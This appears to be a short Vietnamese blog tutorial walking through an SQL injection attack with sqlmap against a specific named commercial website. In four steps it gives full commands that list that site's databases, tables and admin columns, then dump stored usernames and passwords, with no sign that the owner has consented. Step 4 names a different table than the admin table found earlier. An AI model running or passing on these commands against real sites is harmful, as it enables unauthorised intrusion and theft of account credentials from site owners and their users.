Dụng cụ :
- Python + Sqlmap.py
- Victim !!!
Khởi động nhé !!!
- sqlmap.py -h ( hoặc --help nhé !! ) để vào cửa sổ console nhé !
Bắt đầu nhé !
- Bước 1 : Chúng ta sẽ check database
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 --dbs
- u = đường dẫn url
- dbs = Liệt kê databases
và nó sẽ ra như thế này : ví dụ :
+ Theo hình ở trên thì cái dbs là " unecuae_unec " nhé !!! còn cái information_schema thì kệ nó đi khi gặp nó nhé !!!
- Bước 2 : Tiếp theo sẽ check tables của site nhé !!!
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec --tables
- -D = DBMS liệt kê dữ liệu
- --tables = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
và nó sẽ ra như thế này : ví dụ :
Sau khi tìm thấy một cái bảng liệt kê " tables " chúng ta tiếp tục dụng lệnh để tìm ra admin của site nhé !!!
- Bước 3 : Tiếp theo sẽ check columns của tables nhé !!! ( nhìn trên bảng chúng ta kiếm mấy cái liên quan đến tài khoản nhé !!! và ở đây là admin )
+ Lệnh : sqlmap.py -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec -T admin --columns
- -T = DBMS lệnh lệt kê dữ liệu
- --columns = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
Ở đây các bạn sẽ check được column của tables " admin nhé !!! giờ dùng lệnh típ để show hàng hoy !!
- Bước 4 : Bước cuối cùng nhé , giờ mình sẽ show hàng ra nka !!!
+ Lệnh : sqlmap -u http://satthepducthinh.com/chitietsanpham.php?id=15 -D unecuae_unec -T user -C user_username,user_password --dump
Kết thúc
Không có nhận xét nào:
Đăng nhận xét